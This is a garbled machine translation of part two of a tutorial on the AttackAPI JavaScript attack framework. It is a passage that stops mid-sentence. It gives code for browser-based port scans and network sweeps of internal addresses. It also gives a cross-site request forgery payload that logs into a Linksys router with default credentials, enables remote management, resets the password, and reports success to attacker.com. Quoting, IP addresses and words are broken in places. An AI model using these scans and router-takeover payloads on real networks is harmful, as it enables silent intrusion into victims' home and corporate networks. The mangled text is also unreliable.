Proficient in the JavaScript attack framework: AttackAPI (II)

Over the years, the Client Security has not attracted enough attention, but now the situation has changed dramatically. Client Security has become one of the focuses of the information security field. Web malware, AJAX worms, browsing history cracking, logon detection, puppet control technology, network port scanning, browser hijacking, and other technologies are just security SyntaxHighlighter. all ();

Yuwen

Over the years, Client Security has not attracted enough attention, but now the situation has changed dramatically. Client Security has become one of the focuses of the information security field. Web malware, AJAX worms, browser history cracking, logon detection, puppet control technology, network port scanning, browser hijacking, and other technologies are only part of the underground laboratory technology of security researchers, but it has already brought a huge impact.

When a type of security professional emerges and becomes a mainstream exploitation mechanism, suppliers and individuals begin to issue frameworks and automated tools to process tools and testing processes. Although vendors initially focused primarily on AJAX auditing tools, security researchers are more concerned with continuous system boundaries to explore the truth. Due to various possible attack vectors, the Web Application Security Community has also established multiple frameworks to detect and exploit security vulnerabilities, so as to reveal various problems faced by the Web development community.

In the previous article, we introduced how to set up the AttackAPI test environment and how to step on the client. In this article, we will introduce other methods of AttackAPI in detail.

I. Attack Network

Extracting information from the client is only a small part of what attackers can do. Client investigation is only a starting point for premeditated attacks. XSS attacks are not only about Client Security. Because browsers are a bridge between insecure Internet and LAN, attackers can exploit different browser features to locate and attack internal devices.

The following describes how to launch an attack on the Intranet with the help of AttackAPI. Like any planned network attack, we will perform port scanning:

$ A. scanPorts ({
Target: www.gnucitizen.org,
Ports: [443,],
Onfound: function (port ){
Console. log (port)
},
Oncompleted: function (){
Console. log (completed !)
}
});

498) this. style. width = 498; "border = 0>

The port scan result is displayed in our browser. You can see that the browser correctly identifies that port 80 is enabled, and port 81 and port 443 are disabled.

Port Scanning from a browser is not very accurate, so you may receive many false positives. To eliminate false positives, you must use the timeout parameter to tune the scanning process, as shown below:

$ A. scanPorts ({
Target: 'www .gnucitizen.org ',
Ports: [443,],
Timeout: 2000, // try with a couple of values to get better results
Onfound: function (port ){
Console. log (port)
},
Oncompleted: function (){
Console. log ('completed! ')
}
});

Now that we know how to perform port scanning, you can try to identify the ports opened by the enterprise printer by something similar to the following:

$ A. scanPorts ({
Target: '10. 10.128.54 ', // address to the internal printer IP address
Ports: [80, 81,443,910 0],
Onfound: function (port ){
Console. log (port)
},
Oncompleted: function (){
Console. log ('completed! ')
}
});

The timeout parameter defines the length of time for the port scanner to wait for the response from the currently tested port. After this period, it is marked as disabled. If the victim accesses internal Web resources through a proxy, the scanning process will fail. However, this setting is rare.

Note: Firefox and Opera cannot scan ports earlier than 80. This is a security feature implemented by these two browsers, but IE does not have this restriction. AttackAPI can also scan ports in a network range. This technology is commonly referred to as carpet port scanning. It can also be accessed through the sweepPorts function of AttackAPI. The following code demonstrates the capabilities of the sweepPorts function:

$ A. sweepPorts ({
Network: 212.211.193.100-212.211.193.110,
Onfound: function (port ){
Console. log (port)
},
Oncompleted: function (){
Console. log (completed !)
}
});
If everything works, you will see the result shown in 2.

498) this. style. width = 498; "border = 0>

AttackAPI supports two methods to indicate the address range. One is the address range indicated by "Starting IP address-ending IP Address, the other is the IP/MASK [classless Inter-Domain Routing (CIDR)] address range. In this regard, you can use the following code to scan the class C address range of 11.11.66.0:

$ A. sweepPorts ({
Network: '10. 10.56.0/24 ',
Onfound: function (port ){
Console. log (port)
},
Oncompleted: function (){
Console. log ('completed! ')
}
});

To manipulate your network and IP address, you can use some AttackAPI utilities. The names and usage of these utilities are as follows:

Var num = $ A. ip2number ('10. 10.56.10 '); // convert IP to number
Console. log (num)
Var ip = $ A. number2ip (num); // specified tively 168441866 is the same as 10.10.56.10
Console. log (ip );
Var range = $ A. net2range ('10. 10.56.0/24'); // convert network to range
Console. dir (range );
Var net = $ A. range2net (range); // reverse
Console. log (net );

Although identifying open ports and operating systems is important, we can do more than that. For example, we can use a single function call to launch attacks on internal routers.

There are a large number of devices that can be used to learn how to access the Internet. The first device is the famous default gateway. If you are a wireless user, it is your wireless router. To facilitate the configuration and security settings of this vro, you can sometimes use its management interfaces over the Internet. The following is a method by which attackers can quietly complete this task, as long as the victim accesses a malicious web page:

$ A. requestCSRF ({
Method: 'post'
Url: ('HTTP: // admin: admin @ '+ $ A. getInternalIP (). replace (/. d + $/,'. 1') +
'/Setup. cgi ',
Query :{
Remote_management: 'enable ',
SysPasswd: 'abc123 ',
SysConfi rmPasswd: 'abc123'
}
});

First, we call the requestCSRF function, one of the many request functions of the AttackAPI, which can be used to retrieve or call remote resources. Unlike requestXML (which is only valid for resources of the same source), requestCSRF does not have this restriction, but it is always invisible to callers. This means that we cannot get the returned response.

When the RequestCSRF function is called, it can contain some parameters. The first parameter is to define the sending method. Here is POST. Then, define the URL for sending the payload. Note: we check the local IP address of the client and then convert it to the default gateway address through the method described above. Then, we add the default certificate of the router.

Wireless users often keep their routers with default access settings. When the requestCSRF function ends, we declare the actual payload to be sent. This is the parameter query. From the query list, we can see that the remote management interface program is enabled and the system password is set to "abc123 ".

Note: This function uses the default certificate of the Linksys wireless router. If the router has other certificates configured, it provides a basic authentication box for the victims, indicating that they need to be authenticated before approving the request. Remember, the victim does not know what happened in the background. It only seems that the connection has been terminated and the router tries to restore control-This is often the case-that is why the victim is willing to type their certificate and approve the malicious request.

Attacks are always invisible to users. If the authentication succeeds, port 8080 is enabled so that you can use the management interface over the Internet. At this time, the virtual border router and all the machines in the network have completely fallen into the hands of attackers.

The attacker may want to send a configuration message indicating that the user's router has been compromised, as shown below:

$ A. requestCSRF ({
Method: 'post'
Url: ('HTTP: // admin: admin @ '+ $ A. getInternalIP (). replace (/. d + $/,'. 1') +
'/Setup. cgi ',
Query :{
Remote_management: 'enable ',
SysPasswd: 'abc123 ',
SysConfi rmPasswd: 'abc123'
},
Onload: function (){
$ A. requestIMG ('HTTP: // attacker.com/confi rm_compromised.php ');
}
});

The following is a real attack and will cause damage to the Linksys wireless router. Once attackers dive into your network, they can do other things, such as identifying different local devices and collecting as much information as possible. Therefore, users should not trust JavaScript code from any page, and they should be aware of the potential problems of surfing without protection.

In the previous section, we showed that users who have logged on can be found through the scanStates function. However, this function has many other purposes. Because scanStates is based on signatures, we can use it to detect the types and versions of different network devices. The signature is based on the error message caused by a script tag when a resource is remotely accessed, for example, an error caused by a nonexistent resource is different from an error caused by an existing resource. This means that a large enough feature database is provided, we can detect the types and versions of different network devices and enterprise websites. Attackers can successfully identify the version of your organization's intranet key system. If some of them have XSS or CSRF vulnerabilities, attackers can launch targeted attacks to gain permanent or non-permanent control over the victim's sessions.

A browser is a communication platform between the two worlds of a hostile Internet and a local trusted network, making it an ideal platform for attackers to cross the two worlds. In the following sections, we will show how simple it is to enter someone's vro, and how attackers can easily damage network integrity by controlling other devices.

Ii. hijack browsers

There are two main types of XSS attacks: persistent and non-persistent attacks. Persistent attacks are more dangerous because they occur every time users access infected resources. This means that attackers can